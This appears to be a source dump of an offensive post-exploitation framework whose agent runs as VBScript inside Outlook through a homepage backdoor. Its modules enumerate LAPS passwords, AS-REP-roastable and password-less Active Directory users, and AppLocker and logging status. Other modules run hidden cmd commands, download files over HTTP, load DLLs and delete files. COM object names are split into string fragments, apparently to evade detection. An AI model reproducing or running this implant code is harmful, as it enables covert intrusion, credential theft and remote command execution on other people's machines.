2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module reads the content of the hostsfile under 10 | C:\windows\system32\drivers\etc\hosts and outputs to the log. 11 | This might reveal specific hosts or other domains etc. 12 | 13 | It uses Scripting.FileSystemObject 14 | - OpenTextFile 15 | - OpenTextFile().ReadFile.ReadAll 16 | """ 17 | self.entry = 'list_hostsfile' 18 | self.depends = [] 19 | super().__init__(templatepath) 20 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_lapspassword.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates the LAPS passwords in the current domain. 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(\\root\\directory\\LDAP) 14 | - Query: SELECT DS_ms_Mcs_AdmPwd,DS_sAMAccountName,DS_ms_Mcs_AdmPwdExpirationTime FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL 15 | """ 16 | self.entry = 'list_lapspassword' 17 | self.depends = [] 18 | 19 | super().__init__(templatepath) 20 | -------------------------------------------------------------------------------- /functions/operation/network/netstat.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = r""" 9 | This module attempts to recreate netstat in vbscript. 
10 | This will use the WMI class MSFT_NetTCPConnection to retrieve the info. 11 | 12 | It uses: 13 | WbemScripting.SWbemLocator 14 | ConnectServer(".", "root\StandardCimv2") 15 | SELECT FROM MSFT_NetTCPConnection 16 | """ 17 | self.entry = 'netstat' 18 | self.depends = [] 19 | self.options = {} 20 | super().__init__(templatepath) 21 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_services.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the services and status on the host. 10 | It lists out: 11 | - Service name 12 | - State (Stopped|Started) 13 | - Name (Name of the running account for the service) 14 | - BinPath 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - Query: Select * from Win32_Service 19 | """ 20 | self.entry = 'list_services' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/operation/file/list_shortcutinfo.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | Lists details about specified shortcut 9 | 10 | It uses WScript.Shell.CreateShortcut 11 | """ 12 | self.entry = 'list_shortcutinfo' 13 | self.depends = [] 14 | self.options['file'] = { 15 | "value": None, 16 | "required": True, 17 | "description": "Path to shortcut file you want to list info about", 18 | "handler": quotedstring 19 | } 20 | super().__init__(templatepath) 21 | 
-------------------------------------------------------------------------------- /functions/enumerate/host/list_boottime.txt: -------------------------------------------------------------------------------- 1 | Function list_boottime() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select LastBootUpTime from Win32_OperatingSystem") 6 | 7 | For Each obj in col 8 | list_boottime = obj.LastBootUpTime 9 | Next 10 | list_boottime = ( Left(list_boottime, 4) _ 11 | & "/" & Mid(list_boottime, 5, 2) _ 12 | & "/" & Mid(list_boottime, 7, 2) _ 13 | & " " & Mid(list_boottime, 9, 2) _ 14 | & ":" & Mid(list_boottime,11, 2) _ 15 | & ":" & Mid(list_boottime,13, 2)) 16 | list_boottime = "Last Boot time: " & list_boottime 17 | End Function -------------------------------------------------------------------------------- /functions/operation/file/download_filehttp.txt: -------------------------------------------------------------------------------- 1 | Function download_filehttp() 2 | On error resume next 3 | Set oHTTP = window.external.OutlookApplication.CreateObject("MSX" & "ML2.ServerXM" & "LHTTP") 4 | oHTTP.open "GET", {{url}}, False 5 | oHTTP.send 6 | If oHTTP.Status = 200 Then 7 | Dim stream 8 | Set stream = window.external.OutlookApplication.CreateObject("ADO" & "DB.STR" & "EAM") 9 | With stream 10 | .Type = 1 11 | .Open 12 | .Write oHTTP.ResponseBody 13 | .SaveToFile {{destination}} 14 | .Close 15 | End With 16 | retval = "Agent Downloaded file: " & {{url}} & " to " & {{destination}} & " - Success" 17 | Else 18 | retval = "Agent Downloaded file: " & {{url}} & " to " & {{destination}} & " - Failed!" 
19 | End If 20 | 21 | download_filehttp = retval 22 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_passwordpolicy.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates the password policy from the current domain. 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(\\root\\directory\\LDAP) 14 | - Query: SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns 15 | """ 16 | self.entry = 'list_passwordpolicy' 17 | self.depends = [] 18 | 19 | super().__init__(templatepath) 20 | -------------------------------------------------------------------------------- /functions/operation/file/delete_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module deletes the specified file in the file option. 
10 | 11 | It uses Scripting.FileSystemObject 12 | - DeleteFile 13 | - FileExists 14 | """ 15 | self.entry = 'delete_file' 16 | self.depends = [] 17 | self.options['file'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path to file to delete", 21 | "handler": quotedstring 22 | } 23 | super().__init__(templatepath) 24 | -------------------------------------------------------------------------------- /functions/operation/network/netstat.txt: -------------------------------------------------------------------------------- 1 | function netstat() 2 | on error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\StandardCimv2") 5 | 6 | Set colNetstat = objWMIService.ExecQuery("SELECT LocalAddress, RemoteAddress, RemotePort FROM MSFT_NetTCPConnection WHERE State = 5 AND RemoteAddress <> '127.0.0.1' AND RemoteAddress <> '::1' AND RemotePort < 49152") 7 | 8 | If colNetstat.Count = 0 Then 9 | netstat = "No active TCP connections found." 
10 | Else 11 | For Each conn In colNetstat 12 | netstat = netstat & "Local: " & conn.LocalAddress & " | Remote: " & conn.RemoteAddress & ":" & conn.RemotePort & vbCrLf 13 | Next 14 | End If 15 | end function -------------------------------------------------------------------------------- /functions/operation/file/check_filehash.txt: -------------------------------------------------------------------------------- 1 | Function check_filehash() 2 | On Error Resume Next 3 | set oMD5 = window.external.OutlookApplication.CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider") 4 | Set oStream = window.external.OutlookApplication.CreateObject("ADODB.Stream") 5 | oStream.Type = 1 'adTypeBinary 6 | oStream.Open 7 | oStream.LoadFromFile {{file}} 8 | CompleteFile = oStream.Read 9 | oStream.Close 10 | Set oStream = Nothing 11 | 12 | oMD5.ComputeHash_2(CompleteFile) 13 | Set oXml = CreateObject("MSXML2.DOMDocument") 14 | Set oElement = oXml.CreateElement("tmp") 15 | oElement.DataType = "bin.hex" 16 | oElement.NodeTypedValue = oMD5.Hash 17 | check_filehash = "MD5 hash of file " & {{file}} & " is " & oElement.Text 18 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_applocker.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the status of AppLocker. 
10 | It returns one of the following statuses: 11 | - Not Enabled 12 | - Auditing 13 | - Enforced 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - ConnectServer(root\cimv2).EnumKey 18 | - ConnectServer(root\cimv2).GetDwordValue 19 | - ConnectServer(root\cimv2).GetStringValue 20 | 21 | """ 22 | self.entry = 'list_applocker' 23 | self.depends = [] 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_logging.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates status of logging on the host. 10 | It figures out status on logging settings for: 11 | - ProcessCreationIncludeCmdLine 12 | - PowerShell Script Block Logging 13 | - PowerShell Transcript Logging 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - ConnectServer(root\cimv2).EnumKey 18 | - ConnectServer(root\cimv2).GetDWORDValue 19 | """ 20 | self.entry = 'list_logging' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/operation/file/check_fileexist.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module checks if specified file in the file option exists or not. 
10 | 11 | It uses Scripting.FileSystemObject 12 | - FileExists 13 | """ 14 | self.entry = 'check_fileexist' 15 | self.depends = [] 16 | self.options['file'] = { 17 | "value": None, 18 | "required": True, 19 | "description": "path to file you want to check exists", 20 | "handler": quotedstring 21 | } 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_windowsversion.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the Current Windows version on the host. 10 | It retrieves data from HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion and lists out: 11 | - ProductName 12 | - ReleaseId 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer 16 | - ConnectServer(root\cimv2).GetStringValue 17 | """ 18 | self.entry = 'list_windowsversion' 19 | self.depends = [] 20 | super().__init__(templatepath) 21 | 22 | def rethandler(self, agent, options, data): 23 | agent.windowsversion = data -------------------------------------------------------------------------------- /functions/execute/host/cmd.txt: -------------------------------------------------------------------------------- 1 | Function Execute_CMD() 2 | On Error Resume Next 3 | 4 | Const HIDDEN_WINDOW = 0 5 | Set ws = window.external.OutlookApplication.CreateObject("Wscr" & "ipt.s" & "hell") 6 | Set f = window.external.OutlookApplication.CreateObject("Scri" & "pting.FileSyst" & "emObject") 7 | tmp = f.GetSpecialFolder(2) 8 | fn = f.GetTempName 9 | ff = tmp & "\" & fn 10 | c = "cmd /c " & {{command}} & " > " & ff 11 | 12 | ws.Run c, 0, true 13 | if f.FileExists(ff) then 14 | set tf = f.OpenTextFile(ff) 15 | if not tf.atendofstream then 16 | retval = tf.ReadAll 17 | 
tf.close() 18 | Execute_CMD = "Command executed: " & c & vbCrLf & retval 19 | else 20 | tf.close() 21 | Execute_CMD = "Command: " & c & " returned no data" 22 | end if 23 | f.DeleteFile ff 24 | end if 25 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_passwordnotrequired.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates all users from Active Directory that has the --Does not require password-- set. 11 | It returns the sAMAccountName, ADSIPath and the useraccountcontrol value 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(\\root\\directory\\LDAP) 15 | - Query: SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32 16 | """ 17 | self.entry = 'list_passwordnotrequired' 18 | self.depends = [] 19 | super().__init__(templatepath) -------------------------------------------------------------------------------- /lib/validators/files.py: -------------------------------------------------------------------------------- 1 | import traceback 2 | import os 3 | 4 | def isreadable(path, **kwargs): 5 | errmsg = None 6 | try: 7 | if path.lower() == "none": 8 | return True 9 | ret = os.access(path, os.R_OK) 10 | if ret == False: 11 | print("Could not read specified file") 12 | return ret 13 | except Exception as msg: 14 | traceback.print_exc() 15 | print('Exception checking path') 16 | return False 17 | 18 | def isbasename(path, **kwargs): 19 | try: 20 | if '\\' in path: 21 | print("Path given should be basename only, do not use a full path") 22 | return False 23 | else: 24 | return True 25 | except Exception as msg: 26 | traceback.print_exc() 27 | 
print('Exception checking path') 28 | return False 29 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_asreproast.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates all users from Active Directory that has the --Do Not Require Kerberos Pre-authentication-- set. 11 | It returns the sAMAccountName, ADSIPath and the useraccountcontrol value 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(\\root\\directory\\LDAP) 15 | - Query: SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304 16 | """ 17 | self.entry = 'list_asreproast' 18 | self.depends = [] 19 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/trolling/set_clipboard.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module allows you to specify text as input and it will add it to the clipboard 10 | 11 | It uses htmlfile 12 | - ParentWindow.ClipboardData.SetData() 13 | 14 | """ 15 | self.entry = 'set_clipboard' 16 | self.depends = [] 17 | 18 | self.options['clipboardtext'] = { 19 | "value": None, 20 | "required": True, 21 | "description": "Text you want to add to the clipboard", 22 | "handler": quotedstring 23 | } 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- 
/functions/operation/outlook/list_overview.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | This module lists the structure inside outlook to 3 levels deep. Showing folders and number of items inside. 9 | * Deleted Items - items: 45 10 | ** RSS - items: 0 11 | * Inbox - items: 10 12 | ** TestFolder - items: 1 13 | ** test2 - items: 0 14 | *** level3 - items: 5 15 | * Outbox - items: 0 16 | * Sent Items - items: 2 17 | * Archive - items: 7 18 | 19 | It uses OutlookApplication 20 | - GetNameSpace("MAPI").Folders() 21 | """ 22 | self.entry = 'list_overview' 23 | super().__init__(templatepath) 24 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_timezone.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | from lib.core.specmodule import SpecModule 4 | 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | Finds the name of the current timezone for the agent 12 | 13 | It uses WbemScripting.SWbemNamedValueSet 14 | - Add.__ProviderArchitecture 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - ConnectServer(root\cimv2).GetStringValue 19 | """ 20 | self.entry = 'list_timezone' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | 24 | def rethandler(self, agent, options, data): 25 | agent.timezone = data -------------------------------------------------------------------------------- /functions/enumerate/host/list_windowsarch.py: 
-------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the Windows Architecture on the host. 10 | This module writes the result to agent in the database. 11 | Arch value is found under: 12 | HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment - PROCESSOR_ARCHITECTURE. 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer 16 | - ConnectServer(root\cimv2).GetStringValue 17 | """ 18 | self.entry = 'list_windowsarch' 19 | self.depends = [] 20 | super().__init__(templatepath) 21 | 22 | def rethandler(self, agent, options, data): 23 | agent.windowsarch = data -------------------------------------------------------------------------------- /functions/operation/file/check_filearch.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module checks if specified file in the file option exists or not. 
10 | 11 | It uses ADODB.Stream 12 | - Open 13 | - LoadFromFile 14 | - Position 15 | - Read 16 | - Close 17 | """ 18 | self.entry = 'check_filearch' 19 | self.depends = [] 20 | self.options['file'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "path to file you want to check exists", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) 27 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_processes.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates running processes on the host. 10 | It lists out: 11 | - PID 12 | - PPID 13 | - Arch based on virtual size (x86 set to less than 4094967296 Bytes, could be FP here) - Double check using operation-file-check_filearch 14 | - Process Name 15 | - Executable Path 16 | 17 | It uses WbemScripting.SWbemLocator 18 | - ConnectServer(root\cimv2) 19 | - Query: Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process 20 | """ 21 | self.entry = 'list_processes' 22 | self.depends = [] 23 | super().__init__(templatepath) 24 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_basic.txt: -------------------------------------------------------------------------------- 1 | Function list_basic() 2 | On error resume next 3 | Set sh = window.external.OutlookApplication.CreateObject("Wsc" & "ript.Sh" & "ell") 4 | 5 | gds = sh.ExpandEnvironmentStrings("%COMPUTERNAME%") 6 | huj = sh.ExpandEnvironmentStrings("%USERNAME%") 7 | imd = sh.ExpandEnvironmentStrings("%USERDOMAIN%") 8 | fvy = sh.ExpandEnvironmentStrings("%USERPROFILE%") 9 | udd = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%") 10 | fah = 
sh.ExpandEnvironmentStrings("%LOGONSERVER%") 11 | hyf = sh.ExpandEnvironmentStrings("%HOMEPATH%") 12 | 13 | If udd = "%USERDNSDOMAIN%" Then 14 | udd = "WORKGROUP" 15 | End If 16 | 17 | list_basic = "UserName: " & huj & vbCrLf & "ComputerName: " & gds & vbCrLf & "UserDomain: " & imd & vbCrLF & "UserDNSDomain: " & udd & vbCrLF & "Logon server: " & fah & vbCrLF & "Homepath: " & hyf & vbCrLF & "UserProfile: " & fvy & vbCrLF & vbCrLf 18 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_officearch.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the installed Office Architecture on the host. 10 | This module writes the result to agent in the database. 11 | It retrieves the bitness from the Path value under 12 | HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\outlook.exe. 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer(root\cimv2) 16 | - ConnectServer(root\cimv2).GetStringValue 17 | """ 18 | self.entry = 'list_officearch' 19 | self.depends = [] 20 | super().__init__(templatepath) 21 | 22 | def rethandler(self, agent, options, data): 23 | agent.officearch = data -------------------------------------------------------------------------------- /functions/enumerate/host/list_installedapps.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the installed applications. 
10 | It enumerates information from the 11 | HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ 12 | & 13 | HKLM\\SOFTWARE\\wow6432node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ 14 | registry keys. 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - Add 18 | - ConnectServer(root\cimv2) 19 | - ConnectServer(root\cimv2).EnumKey 20 | - ConnectServer(root\cimv2).GetStringValue 21 | """ 22 | self.entry = 'list_installedapps' 23 | self.depends = [] 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_ntdomaininfo.txt: -------------------------------------------------------------------------------- 1 | Function list_ntdomaininfo() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set colNTDomain = objWMIService.ExecQuery("Select * from Win32_NTDomain") 6 | 7 | For Each domain in colNTDomain 8 | For Each domAttribute in domain.Properties_ 9 | if Not (IsNull(domAttribute.value) OR IsEmpty(domAttribute.value)) Then 10 | if IsArray(domAttribute) then 11 | ntinfo = ntinfo & domAttribute.Name & ": " & Join(domAttribute, ", ") & vbCrLf 12 | else 13 | ntinfo = ntinfo & domAttribute.Name & ": " & domAttribute.value & vbCrLf 14 | end if 15 | end if 16 | Next 17 | Next 18 | list_ntdomaininfo = ntinfo 19 | End Function -------------------------------------------------------------------------------- /functions/api/load_dll.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | Loads a dll from disk using LoadLibrary 9 | """ 10 | self.entry = 'load_dll' 11 | self.depends = [] 12 | self.options['dll'] 
= { 13 | "value": None, 14 | "required": True, 15 | "description": "dll to load", 16 | "handler": None 17 | } 18 | super().__init__(templatepath) 19 | 20 | def preprocess(self, agent): 21 | if agent.api_verified != True: 22 | raise RuntimeError("API has not been verified, please run api_verify first to check that the API is working\nIf it works it will mark the attribute api_verified to True\nTo override you would need to use dbedit to change the value to true") 23 | -------------------------------------------------------------------------------- /functions/operation/file/list_acl.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module lists the ACL for the specified file or folder in the Path option. 
10 | 11 | It uses WbemScripting.SWbemLocator: 12 | - Query: Select * from win32_logicalFileSecuritySetting WHERE Path= 13 | -- GetSecurityDescriptor 14 | """ 15 | self.entry = 'list_acl' 16 | self.depends = [] 17 | self.options['path'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path to file or folder you want to see ACL's for", 21 | "handler": quotedstring 22 | } 23 | super().__init__(templatepath) 24 | -------------------------------------------------------------------------------- /functions/operation/outlook/list_overview.txt: -------------------------------------------------------------------------------- 1 | Function list_overview() 2 | on error resume next 3 | Set folder = window.external.OutlookApplication.GetNameSpace("MAPI") 4 | set subfolders = folder.Folders(1).Folders 5 | for i = 1 To subfolders.count 6 | output = output & "| " & subfolders(i) & " (" & subfolders(i).items.Count & ")" & vbCrLf 7 | if subfolders(i).folders.count <> 0 then 8 | for ii = 1 To subfolders(i).folders.count 9 | output = output & "-> " & subfolders(i).folders(ii) & " (" & subfolders(i).folders(ii).items.count & ")" & vbCrLf 10 | if subfolders(i).folders(ii).folders.count <> 0 then 11 | for iii = 1 To subfolders(i).folders(ii).folders.count 12 | output = output & "--> " & subfolders(i).folders(ii).folders(iii) & " (" & subfolders(i).folders(ii).folders(iii).items.count & ")" & vbCrLf 13 | next 14 | end if 15 | next 16 | end if 17 | next 18 | list_overview = output 19 | End Function -------------------------------------------------------------------------------- /functions/execute/host/wscriptshell.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module executes 
command defined in the command option through the wscript com object. 11 | The executed file will become a sub-process under outlook.exe. 12 | Normally NOT OPSEC SAFE 13 | 14 | It uses Wscript.shell 15 | - run 16 | """ 17 | self.entry = 'Execute_WscriptShell' 18 | self.depends = [] 19 | self.options['command'] = { 20 | "value": None, 21 | "required": True, 22 | "description": "command to execute via wscript com object", 23 | "handler": quotedstring 24 | } 25 | super().__init__(templatepath) 26 | -------------------------------------------------------------------------------- /functions/api/run_shell.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | Run a basic shell command via the installed com object 9 | """ 10 | self.entry = 'run_shell_api' 11 | self.depends = [] 12 | self.options['cmd'] = { 13 | "value": None, 14 | "required": True, 15 | "description": "Command to execute", 16 | "handler": None 17 | } 18 | super().__init__(templatepath) 19 | 20 | def preprocess(self, agent): 21 | if agent.api_verified != True: 22 | raise RuntimeError("API has not been verified, please run api_verify first to check that the API is working\nIf it works it will mark the attribute api_verified to True\nTo override you would need to use dbedit to change the value to true") 23 | -------------------------------------------------------------------------------- /functions/execute/host/remove_homepage.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Removes the homepage implant in a nice way :-). 
10 | This should be used when you want to remove the homepage backdoor on a host. 11 | It removes the URL registry key as well as the EnableRoamingFolderHomepages. 12 | 13 | It uses WbemScripting.SWbemNamedValueSet 14 | - Add.__ProviderArchitecture 15 | - Add.__RequiredArchitecture 16 | 17 | It uses WbemScripting.SWbemLocator 18 | - ConnectServer(root\cimv2) 19 | - ConnectServer(root\cimv2).GetStringValue 20 | - ConnectServer(root\cimv2).DeleteValue 21 | """ 22 | self.entry = 'remove_homepage' 23 | self.depends = [] 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/operation/file/delete_dir.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will delete specified directory and all contents (all files and subfolders). 10 | Specify folder path without trailing \\ 11 | 12 | It uses Scripting.FileSystemObject 13 | - DeleteFolder 14 | - FolderExists 15 | """ 16 | self.entry = 'delete_dir' 17 | self.depends = [] 18 | self.options['directory'] = { 19 | "value": None, 20 | "required": True, 21 | "description": "Path to directory that should be deleted. i.e. 
c:\\parent\\random_secret_folder", 22 | "handler": quotedstring 23 | } 24 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/host/list_networkcardinfo.txt: -------------------------------------------------------------------------------- 1 | Function list_networkcardinfo() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2") 5 | Set colNicConfigs = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration",,48) 6 | 7 | For Each NIC in colNicConfigs 8 | For Each nicAttribute in NIC.Properties_ 9 | if Not (IsNull(nicAttribute.value) OR IsEmpty(nicAttribute.value)) Then 10 | if IsArray(nicAttribute) then 11 | nicResponse = nicResponse & nicAttribute.Name & ": " & Join(nicAttribute, ", ") & vbCrLf 12 | else 13 | nicResponse = nicResponse & nicAttribute.Name & ": " & nicAttribute.value & vbCrLf 14 | end if 15 | end if 16 | Next 17 | Next 18 | list_networkcardinfo = nicResponse 19 | End Function -------------------------------------------------------------------------------- /functions/operation/file/create_dir.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module creates the directory structure (recursive) 10 | specified in the directory option. 
